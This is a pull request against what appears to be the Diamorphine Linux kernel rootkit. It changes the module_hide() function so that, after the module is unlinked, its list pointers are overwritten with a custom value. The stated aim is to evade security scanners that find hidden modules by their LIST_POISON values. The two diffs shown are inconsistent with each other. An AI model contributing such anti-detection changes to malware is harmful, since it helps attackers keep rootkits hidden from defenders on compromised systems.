### PR TITLE
Struct module list pointers modify

### DIFF
--- a/diamorphine.c
+++ b/diamorphine.c
@@ -313,7 +313,6 @@ module_hide(void)
 	module_previous = THIS_MODULE->list.prev;
 	list_del(&THIS_MODULE->list);
 	
-	/* Change list pointers to avoid decetct by LIST_POISON1 and LIST_POISON2 values */
 	THIS_MODULE->list.prev = (void *)0x8163;
 	THIS_MODULE->list.next = (void *)0x8163;
 	module_hidden = 1;

--- a/diamorphine.c
+++ b/diamorphine.c
@@ -312,6 +312,10 @@ module_hide(void)
 {
 	module_previous = THIS_MODULE->list.prev;
 	list_del(&THIS_MODULE->list);
+	
+	/* Change list pointers to avoid decetct by LIST_POISON1 and LIST_POISON2 values */
+	THIS_MODULE->list.prev = (void *)0x8163;
+	THIS_MODULE->list.next = (void *)0x8163;
 	module_hidden = 1;
 }
 


### PR DESCRIPTION
@m0nad HI

Modify list.prev and list.next after module_hide() to avoid detection
After `list_del()`, the kernel sets `list.prev` and `list.next` to
LIST_POISON1/LIST_POISON2. Security tools detect hidden modules by
scanning for these well-known poison values.
This patch overwrites both pointers with a custom value after removal,
making the module's list entry less detectable by automated scanners.